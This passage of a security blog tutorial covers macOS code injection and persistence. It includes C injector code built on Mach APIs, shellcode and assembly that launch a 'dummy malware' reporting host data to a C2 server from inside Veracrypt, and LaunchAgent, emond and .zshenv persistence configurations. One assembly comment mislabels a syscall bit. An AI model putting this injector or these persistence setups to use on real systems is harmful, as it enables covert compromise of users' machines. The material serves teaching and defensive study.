the executable's __TEXT,__text section. We can achieve this by
declaring the shellcode as a variable within the code itself. Here's
a simple example:

const char output[] __attribute__((section("__TEXT,__text"))) =  "
\xeb\x1e\x5e\xb8\x04\x00\x00\x02\xbf\x01
\x00\x00\x00\xba\x0e\x00\x00\x00\x0f\x05
\xb8\x01\x00\x00\x02\xbf\x00\x00\x00\x00
\x0f\x05\xe8\xdd\xff\xff\xff\x48\x65\x6c
\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x21\x0d\x0a";

typedef int (*funcPtr)();

int main(int argc, char **argv)
{
    funcPtr ret = (funcPtr) output;
    (*ret)();

    return 0;
}

Alright, now that we have the shellcode, let's start writing the
actual injector. The main function seems like the natural starting
point. The logic is simple: we take a single command-line argument,
which should be the process ID (PID) of the target process to inject
the shellcode into. Then, we obtain a handle to our task using
task_for_pid(). Next, we'll allocate a memory buffer in the remote
task with mach_vm_allocate(). After that, we'll write our shellcode
to the remote buffer with mach_vm_write(). We'll modify the memory
permissions of the remote buffer with mach_vm_protect(). Then, we'll
update the remote thread context to point to the start of the
shellcode with thread_create_running(). Finally, we'll run our
shellcode, which will print "Hello World".

Remember our earlier discussion about the differences between a Mach
task thread and a BSD pthread, and the task_for_pid() API call. In
order to develop a utility that utilizes task_for_pid(), you'll need
to create an Info.plist file. This file will be embedded into your
executable and will enable code signing with the key set to "allow".
Below is an example of the Info.plist:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>com.apple.security.get-task-allow</key>
<true/>
</dict>
</plist>

Note:** not all sections of a program's virtual memory permit their
contents to be interpreted as code by the CPU (i.e., "marked
executable"). Memory can be marked as readable (R), writable (W),
executable (E), or some combination of the three. For instance, a
page marked RW means one can read/write to these addresses in memory,
but their contents may not be treated as executable by the CPU. This
is a crucial aspect of memory protection and security in modern
operating systems.

Executable memory regions are typically marked with the execute (E)
permission, allowing the CPU to interpret the contents of these
regions as machine instructions and execute them. This is essential
for running programs, as the CPU needs to fetch instructions from
memory and execute them.

However, allowing arbitrary memory regions to be executable can pose
significant security risks, such as buffer overflow attacks or
injection of malicious code. Therefore, modern operating systems
employ memory protection mechanisms to restrict the execution of code
to specific, authorized regions of memory.

By controlling the permissions of memory pages, operating systems can
enforce security policies and prevent unauthorized execution of code.
For example, writable memory regions that contain data should not be
executable to prevent the execution of injected malicious code.
Conversely, executable code should not be writable to prevent
tampering with the program's instructions.

Alright, the entry point we converts the PID provided as a string to
an integer and calls the inject_shellcode function to inject the
shellcode into the target process using the provided PID,

We need to interact with the target process, so we declare a few
variables to hold essential information. These include remote_task to
represent the task port of the target process, remote_stack to store
the address of the allocated memory for the remote stack within the
target process, and shellcode_region to keep track of the memory
region allocated for the shellcode.

Now, the process begins. We need to get permission to access the
target process, so we use the task_for_pid function to obtain the
task port. This allows us to manipulate the memory and threads of the
target process.

With access granted, we proceed to allocate memory within the target
process. We reserve space for both the remote stack and the shellcode
using mach_vm_allocate. This ensures that we have a place to execute
our code, Once memory is allocated, we write our shellcode into the
allocated memory space of the target process using mach_vm_write.
This effectively places our code where it needs to be executed.

int inject_shellcode(pid_t pid, unsigned char *shellcode, size_t shellcode_size) {
    task_t remote_task;
    mach_vm_address_t remote_stack = 0;
    vm_region_t shellcode_region;
    mach_error_t kr;

    // Get the task port for the target process
    kr = task_for_pid(mach_task_self(), pid, &remote_task);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to get the task port for the target process: %s\n", mach_error_string(kr));
        return -1;
    }

    // Allocate memory for the stack in the target process
    kr = mach_vm_allocate(remote_task, &remote_stack, STACK_SIZE, VM_FLAGS_ANYWHERE);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to allocate memory for remote stack: %s\n", mach_error_string(kr));
        return -1;
    }

    // Allocate memory for the shellcode in the target process
    kr = mach_vm_allocate(remote_task, &shellcode_region.addr, shellcode_size, VM_FLAGS_ANYWHERE);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to allocate memory for remote code: %s\n", mach_error_string(kr));
        return -1;
    }
    shellcode_region.size = shellcode_size;
    shellcode_region.prot = VM_PROT_READ | VM_PROT_EXECUTE;

    // Write the shellcode to the allocated memory in the target process
    kr = mach_vm_write(remote_task, shellcode_region.addr, (vm_offset_t)shellcode, shellcode_size);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to write shellcode to remote process: %s\n", mach_error_string(kr));
        return -1;
    }

    // Adjust memory permissions for the shellcode
    kr = vm_protect(remote_task, shellcode_region.addr, shellcode_region.size, FALSE, shellcode_region.prot);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to set memory permissions for remote code: %s\n", mach_error_string(kr));
        return -1;
    }

    // Create a remote thread to execute the shellcode
    x86_thread_state64_t thread_state;
    memset(&thread_state, 0, sizeof(thread_state));
    thread_state.__rip = (uint64_t)shellcode_region.addr;
    thread_state.__rsp = (uint64_t)(remote_stack + STACK_SIZE);

    thread_act_t remote_thread;
    kr = thread_create(remote_task, &remote_thread);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to create remote thread: %s\n", mach_error_string(kr));
        return -1;
    }

    // Set the thread state
    kr = thread_set_state(remote_thread, x86_THREAD_STATE64, (thread_state_t)&thread_state, x86_THREAD_STATE64_COUNT);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to set thread state: %s\n", mach_error_string(kr));
        return -1;
    }

    // Resume the remote thread
    kr = thread_resume(remote_thread);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to resume remote thread: %s\n", mach_error_string(kr));
        return -1;
    }

    printf("Shellcode injected successfully!\n");

    mach_port_deallocate(mach_task_self(), remote_thread);

    return 0;
}

To ensure that our shellcode can run, we modify the memory
permissions of the allocated memory region containing the shellcode.
We use vm_protect to set the appropriate permissions, allowing for
execution. Now, it's time to execute our shellcode. We create a
remote thread within the target process using thread_create. This
thread will be responsible for running our injected code.

Before we start the thread, we need to set its state. We prepare the
thread to execute our shellcode by setting the instruction pointer
(rip) to the starting address of the shellcode and the stack pointer
(rsp) to the allocated remote stack. Finally, we're ready to execute
our shellcode. We resume the remote thread using thread_resume,
allowing it to begin executing the injected code.

If everything goes smoothly, we print a success message indicating
that the shellcode was injected successfully. We also clean up any
resources used during the injection process by deallocating Mach
ports. And that's it! The entire process of injecting shellcode into
a target process on macOS using Mach APIs.

In our injector, we're injecting shellcode into a target process
using Mach APIs in macOS. Now, one significant difference between
POSIX threads and Mach threads comes into play here. POSIX threads
utilize the thread local storage (TLS) data structure, which is
crucial for managing thread-specific data. However, Mach threads
don't have this concept of TLS.

Now, when we inject our shellcode into the target process and create
a remote thread to execute it, we can't simply point the instruction
pointer in the thread context struct and expect everything to work
smoothly. Why? Because our shellcode, which is essentially unmanaged
code, needs to run in a controlled environment, and transitioning
from a Mach thread directly to executing our shellcode might cause
issues.

So, to prevent potential crashes or errors, we need to ensure that
our shellcode is executed within the context of a fully-fledged POSIX
thread. This means that as part of our injection process, we have to
somehow promote our shellcode from being executed within the context
of a base Mach thread to being executed within the context of a POSIX
thread. By doing this, we create a more stable environment for our
shellcode to execute, ensuring that when the target process resumes
its execution at the start of our shellcode, it does so without any
issues. This promotion process is essential for the successful
execution of our injected shellcode in user mode without causing
crashes or unexpected behavior.

As you can see, we injected our shellcode into the Veracrypt process
successfully. The message "Hello World!" was printed, confirming that
the shellcode executed as expected and produced the desired output.

[IMG5]

However, let's shift our focus now. Remember the code we previously
developed to transmit system data to the C2 server? What if we inject
shellcode into the Veracrypt process to execute our dummy malware,
enabling it to establish communication with the C2 server and
transmit host data?

To execute a shell command, considering I'm running zsh, we need to
trigger a syscall to run /bin/zsh -c. For this, we need to utilize
execve. What does this do? Simply put, it executes the program
referenced by _pathname, which in our case will be the path to our
dummy malware executable.

Alright, let's proceed by writing a simple assembly code to execute /
bin/zsh -c '/Users/foo/dummy'. First, we'll set up a register (rbx)
and load the string '/bin/zsh' into it. Once this string is pushed
onto the stack, we'll proceed to load the ASCII values for -c into
the lower 16 bits of the rax register. After pushing this -c flag
onto the stack, we'll set the rbx register to point to the -c flag on
the stack, as it will be necessary later during the syscall
preparation.

Any additional details will be described in comments within the code.
At the end of this section, there's an indirect jump facilitating the
execution of subsequent instructions. This jump redirects the program
flow to the address stored in the exec subroutine, ensuring the
continuity of execution.

global _main

_main:
    xor rdx, rdx        ; Clear rdx register
    push rdx            ; Push NULL onto stack (String terminator)
    mov rbx, '/bin/zsh' ; Load '/bin/zsh' into rbx
    push rbx            ; Push '/bin/zsh' onto stack
    mov rdi, rsp        ; Set rdi to point to '/bin/zsh\0'
    xor rax, rax        ; Clear rax register
    mov ax, 0x632D      ; Load "-c" into lower 16 bits of rax
    push rax            ; Push "-c" onto stack
    mov rbx, rsp        ; Set rbx to point to "-c"
    push rdx            ; Push NULL onto stack
    jmp short dummy     ; Jump to label dummy

exec:
    push rbx            ; Push "-c" onto stack
    push rdi            ; Push '/bin/zsh' onto stack
    mov rsi, rsp        ; Set RSI to point to stack
    push 59             ; Push syscall number
    pop rax             ; Pop syscall number into rax
    bts rax, 25         ; Set 25th bit of rax (AT_FDCWD flag)
    syscall             ; Invoke syscall

dummy:
    call exec                   ; Call subroutine exec
    db '/Users/foo/dummy_m', 0  ; Define string
    push rdx                    ; Push NULL onto stack

Alright, it's time to try this beauty. As usual, we'll need to
extract the shellcode and test it before using it. And just like
that, bingo! We've successfully injected our shellcode, triggering
our dummy malware. We're now receiving host information in the C2
server. We can push this further by exploring additional capabilities
and attack vectors, even achieve persistence, but I think that's
enough for now.

[IMG6]

Executing and sending host information essentially does nothing
harmful to your computer. "Dummy" is more about demonstrating how
malware can be triggered and how it uses injection techniques to
spread. It's also interesting for defensive evasion or adding
backdoor capabilities. This was just a quick look at the Mach API,
covering system calls and code injection techniques, and how an
attacker can utilize something like process injection to achieve
malicious behavior. In this example, we've used a legitimate process
to inject and execute "malicious code," potentially exposing host
data to an attacker. This can be pushed further, but we're here just
to learn, and I encourage you to experiment with caution. Code
injection must be used with care.

I hope you've learned something from this simple introduction, and
there's a lot more to explore beyond what we've touched on here. All
the code used here can be found at Github

Persistence

Alright, let's discuss persistence. It's a crucial step once we've
gained initial access and understood the situation. Typically, we aim
to establish some form of persistence. We don't want to rely solely
on that initial access point because it could be terminated for
various reasons. There might be issues with the user's computer, or
the target could decide to shut everything down. So, it's important
to have a method in place to maintain access to the target.

While there are several persistence techniques for MacOS systems,
many of them require root privileges to perform, or exploit some sort
of low-level vulnerability to escalate. To keep things simple, let's
focus on Userland Persistence. First, I'll describe some well-known
persistence techniques and some lesser-known ones, so you can
understand how these techniques work and how malware can use them.
Alright, let's go :

Before I began writing this article, I analyzed some samples
targeting macOS and read some threat reports. One commonality among
them is that launch agents and launch daemons are by far the most
prevalent methods of persistence. Why, you might ask? Well, it's
because of their simplicity and flexibility. You could liken them to
the startup folder persistence equivalent on Windows. However,
detecting such techniques is relatively easy. Remember when we
mentioned LOLBins? Well, think of it as a similarly straightforward
and common method, and the detection methods are also well-known.

LaunchAgent & LaunchDaemon

LaunchAgents and LaunchDaemons are key components of macOS,
responsible for managing processes automatically. LaunchAgents are
typically located in the ~/Library/LaunchAgents directory for
user-specific tasks, triggering actions when a user logs in. On the
flip side, LaunchDaemons are situated in /Library/LaunchDaemons,
initiating tasks upon system startup.

Although LaunchAgents primarily operate within user sessions, they
can also be found in system directories like /System/Library/
LaunchAgents. However, modifying these files would require disabling
System Integrity Protection (SIP), which is not recommended due to
potential security risks. In contrast, LaunchDaemons, operating at a
system level, require administrator privileges for installation and
typically reside in /Library/LaunchDaemons.

Both LaunchAgents and LaunchDaemons are configured using .plist
files, specifying commands or referencing executable files for
execution.

LaunchAgents are suitable for tasks requiring user interaction, while
LaunchDaemons are better suited for background processes. Let's take
a LaunchAgents example:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.pre.foo.plist</string>
    <key>ProgramArguments</key>
    <array>
        <string>/Users/foo/dummy</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>

So, what does this all mean? Basically, when we want our binary to
run every time a user logs onto the system, we just tell launchd to
handle it. It's pretty straightforward, right? But here's where it
gets interesting: there's something called emond, a command native to
macOS located at /sbin/emond. This little tool is quite handy; it
accepts events from various services, processes them through a simple
rules engine, and takes action accordingly. These actions can involve
running commands or performing other tasks.

Now, emond isn't just any ordinary command. It functions as a regular
daemon and is kicked off by launchd every time the operating system
starts up. Its configuration file, where we set when and how emond
runs, hangs out with the other system daemons at /System/Library/
LaunchDaemons/com.apple.emond.plist.

But how can we use this event monitoring daemon to establish
persistence? Well, the mechanics of emond are pretty much like any
other LaunchDaemon. It's launchd's job to fire up all the
LaunchDaemons and LaunchAgents during the boot process. Since emond
starts up during boot, if you're using the _run command_ action, you
need to be mindful of what command you're executing and when during
the boot process it'll happen.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
    <dict>
        <key>name</key>
        <string>foo</string>
        <key>enabled</key>
        <true/>
        <key>eventTypes</key>
        <array>
            <string>startup</string>
        </array>
        <key>actions</key>
        <array>
            <dict>
                <key>command</key>
                <string>sleep</string>
                <key>user</key>
                <string>root</string>
                <key>arguments</key>
                <array>
                    <string>10</string>
                </array>
                <key>type</key>
                <string>RunCommand</string>
            </dict>
            <dict>
                <key>command</key>
                <string>curl</string>
                <key>user</key>
                <string>root</string>
                <key>arguments</key>
                <array>
                    <string>dns.log</string>
                </array>
                <key>type</key>
                <string>RunCommand</string>
            </dict>
        </array>
    </dict>
</array>
</plist>

So, in our SampleRules.plist file, we have a setup called 'foo'.
First off, it waits for 10 seconds after startup. This is done using
a command called sleep. Next, we use curl to simply send a DNS query
record to verify that it's actually working, and once the service has
started, your event will immediately fire and trigger any actions.
emond isn't a new way to monitor events on macOS, but it's considered
innovative when used for offensive purposes.

Bash Profiles & Zsh Startup

Let's talk about those bash profiles on Linux systems. They're
essentially scripts containing commands that run whenever you open up
a terminal, Instead of bash profiles, zsh has its own version called
start files, which serve the same purpose. But here's the twist: zsh
also comes with an extra file called the zsh environment file. This
file is more powerful because it kicks in more often, ensuring
persistence across different interactions with zsh.

The cool thing is that even if you just type in a command like zsh
-c, this shell environment file still gets sourced. This means your
persistence setup remains strong, no matter how you're using shell.

~ > cat .zshenv
. "/Users/foo/startup.sh" > /dev/null 2>&1&

Now, every time you open a terminal and Z shell initializes, it will
automatically execute the startup.sh script, ensuring that your
desired commands or actions are performed consistently.

[IMG7]

Now, to execute it in the background, we use setopt NO_MONITOR. This
command disables job monitoring and then runs the startup.sh script
in the background. As a result, the script runs every time you open a
terminal with Z shell, but it runs silently in the background.

So, you get the gist of it, right? These are some of the known
techniques I've come across, especially in samples. There's more like
Cron jobs, Dock shortcuts, and more. But to be honest, if I were to
write specifically for macOS, I'd go multi-stage and avoid any known
techniques out there. Simply put, once a technique is made public,
it's burned. So , I'll focus more on developing something that has a
longer lifespan.

Nowadays, with all the public scripts and post-exploitation
frameworks out there, attackers try to get the job done easily
without wasting time or energy. Writing malware takes time and
energy, so they aim for low-hanging fruit that's just acceptable for
a malware author. Because once the malware is burned, it's burned.
But if it's a long-term operation, it takes time and skill to put
together, and you can't risk the malware getting burned by the first
few infection. But for a red team exercise, for example, you'd test
low-hanging fruit and an easy way to get in before emulating advance
threats.

Also, a skilled attacker can get past most security setups with just
a simple MSFvenom shellcode. Yep, so at the end, it comes down to the
simplest attacks. Usually, at this point in the article, I've added a
section for writing a simple malware, where we take all that we've
covered and put it into one malware(rootkit). However, considering
some thought, adding more code might just make things drag on and get
confusing. We can save that for another article where we can really
dive into the whole process because rootkits are quite advanced
pieces of code and require knowledge about the kernel and low-level
system programming. Since we just covered the surface here, I don't
think a rootkit would be a match for this article; it needs its own
article.

But hey, since we've already covered code injection pretty
extensively, we'll get into the fancy stuff later.

Conclusion

In conclusion, I hope that you've enjoyed and learned something from
this article. We've covered a broad array of topics related to the
macOS architecture and API, although we've only scratched the
surface. By delving into techniques and writing simple code using the
Mach API, we've gained a deeper understanding of the environment, its
features, and its security. We've covered fundamental concepts like
code injection and simple persistence techniques, and we've even seen
macOS syscalls in action through examples. Until next time.

References

  * I/O Kit Fundamentals
  * macOS - Apple Developer
  * Code Injection on macOS
  * Simple Code Injection
  * Writing 64-bit Assembly on Mac OS X
  * Architecture of the Kernel - Darwin

Written on March 9th, 2024 by 0xf00
Feel free to share!
  

You may also enjoy:

  * Cyber Threat Intelligence - TOR Investigations

Security Blog: Malware, RE, Threat Intelligence, and More. by 0xf00